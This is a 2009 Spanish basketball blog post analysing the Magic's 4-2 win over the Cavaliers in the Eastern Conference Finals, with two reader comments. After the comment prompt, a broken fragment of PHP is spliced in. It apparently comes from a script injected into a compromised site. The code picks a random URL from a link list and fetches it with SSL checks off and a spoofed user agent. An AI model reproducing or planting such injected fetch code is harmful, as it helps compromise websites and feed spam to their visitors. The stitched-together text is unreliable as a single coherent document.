Cavaliers 2 – Magic 4: Todos contra Él

02 de June de 2009 por Viva_Dirk

Saltó la sorpresa en la Final del Este donde, al contrario que en el Oeste, los favoritos llegaban con todas las buenas sensaciones del mundo, un 8-0 y sin despeinarse. Las dudas se centraban en como reaccionaría el equipo ante la adversidad y la verdad es que no reaccionaron ni bien ni mal sinó que yo diría que lo que hemos visto es lo que hay.

Hemos visto a LeBron James haciendo números sobrehumanos (38.5 puntos, 8.3 rebotes, 8 asistencias), con una de las canastas más brutales de lo que va de siglo. Detrás de él, un Mo Williams implicado y con iniciativa pero impreciso y fallón, más un tercer espada como Delonte West con nada menos que 45 minutos por encuentro y números muy acertados en los momentos calientes. En definitiva, no creo que se le pueda echar en cara nada a ningún jugador de los Cavs individualmente hablando.

Los Magic han jugado a ‘dejar’ anotar a LeBron a la vez que cada minuto que pasaba iban ajustando la defensa sobre sus compañeros, las ayudas sobre él y atacando más pausado, con múltiples opciones. La superioridad de Dwight Howard en el juego interior ha sido casi como la de James (26 puntos y 13 rebotes), doblando el número de asistencias de la anterior eliminatoria, anotando nada menos que un 65% de sus tiros y cubriendo con nota su punto negro con un 70% desde la línea de tiros libres.

Los dos principales secuaces de Howard han dado la cara como no puede ser de otra manera en jugadores de su calidad. La posición “Rashard Lewis” ha machacado a Mike Brown, que cuando ha puesto a LeBron sobre él ha recibido puntos y segundas opciones de Howard, y cuando lo ha defendido un interior le han cosido a triples. Mientras, Hedo Turkoglu parece haber alcanzado su total madurez como jugador. Ha ejercido de point forward, ha anotado tiros decisivos y ha defendido muy inteligentemente a LeBron. Para colmo, de los que se esperaba menos han cumplido con nota.

Los Magic tienen más calidad, jugadores más experimentados y un juego menos previsible. Todo eso les ha llevado a la victoria por encima de lo que podríamos llamar el ejército de LeBron. Nadie puede decir que los Cavs han perdido esta eliminatoria porque han sido los de Van Gundy los que no les han dado opciones. Han sido mejores en todo.

PREMIOS

MVP: Dwight Howard por todo lo dicho. “Supermán” rules.

Sorpresa: Mickael Pietrus ha sido en muchos momentos lo que a los americanos les gusta llamar el ‘factor x’, 13.8 puntos por encuentro y un brillante 47.2% en triples.

Decepción: A mi no me ha decepcionado nada de esta eliminatoria, a ver si vosotros encontráis algo.

Mayor Esfuerzo en Vano: Lorenzen Wright :p

Comenta

2 comentarios a esta entrada

  1. TheDeerHunter dice:
    #1

    Pues no sé… yo sí he hechado de menos soluciones defensivas al teórico mejor equipo en ese aspecto de toda la liga.
    Y la segunda espada… a Williams se le fichó para hacer algo más, entiendo. Se supone que es un casi-all star.
    Sin contar a Ilgauskas. ¿Porqué no se ha utilizado a Joe Smith??
    O también Gibson, que fue clave cuando llegaron a la otra final.
    Podríamos poner a cualquiera de ellos para el premio de decepción de la eliminatoria.

    Me parece un poco fuerte pensar que no había nada más en este equipo

    Muy bueno lo de Lorenzen Wright…

      Citar

  2. Jabho dice:
    #2

    Yo si creo que los Cavs han decepcionado. Yo he seguido de cerca la eliminatoria y la clave es que en la pintura el dominio de Howard ha sido abrumador. Ilgauskas ha hecho una eliminatoria muy floja. Mo Williams más de lo mismo, el banco un solar … la defensa sobre en general ha sido floja y muy desajustada por el duo Lewis-Howard, el ataque de los Cavs ha sido muy monotemático y no han aparecido variantes.

    Como tu creo que LeBron más no ha podido hacer. Sobresaliente su eliminatoria. Delonte aprobado. El resto de titulares suspenso cerca de aprobar, pero el banco muy, muy mal… En una aliminatoria igualada es clave.

    Por contra los Magic han encontrado a Lee cumplidor, Pietrus muy bien, Gortat ha hecho su papel,… Inlcuso Alston. Magic ha ofrecido una buena versión y los Cavs no, y de ahí el 4-2 que pudo haber sido peor.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>